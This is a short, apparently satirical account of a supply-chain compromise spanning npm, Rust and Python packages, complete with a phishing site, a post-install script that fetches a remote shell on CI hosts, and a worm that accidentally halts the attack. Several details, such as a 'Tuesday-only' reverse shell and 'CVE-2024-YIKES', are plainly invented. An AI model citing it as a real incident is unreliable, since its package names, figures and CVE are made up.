On March 3, maintainer Marcus Chen reported a stolen YubiKey, laptop and transit pass, prompting a phishing site that harvested his npm credentials. The bogus domain yubikey‑official‑store.net, registered six hours earlier, thanked him for a three‑to‑five‑day delivery. Using the tokens, the attacker published a malicious left-justify update (847 million weekly downloads) that exfiltrated credential files to a server in a jurisdiction the attacker believed safe.

Those credentials granted access to vulpine‑lz4, a Rust LZ4 compression crate bundled into cargo and later vendored by the Python build tool snekpack. A post‑install script in vulpine‑lz4 0.4.1 fetched and executed a remote shell when CI hostnames matched strings like “build” or “jenkins”. The payload added an SSH key, installed a Tuesday‑only reverse shell, and switched users’ default shell to fish.

A separate cryptocurrency worm, cryptobro‑9000, unintentionally upgraded snekpack to a clean 3.7.1 release, overwriting the compromised crate and halting the attack. Roughly 4 million developers received the malicious package, while an equal number were saved by the worm’s accidental rollback. The episode earned CVE‑2024‑YIKES and underscored fragile trust chains across npm, Rust and Python ecosystems.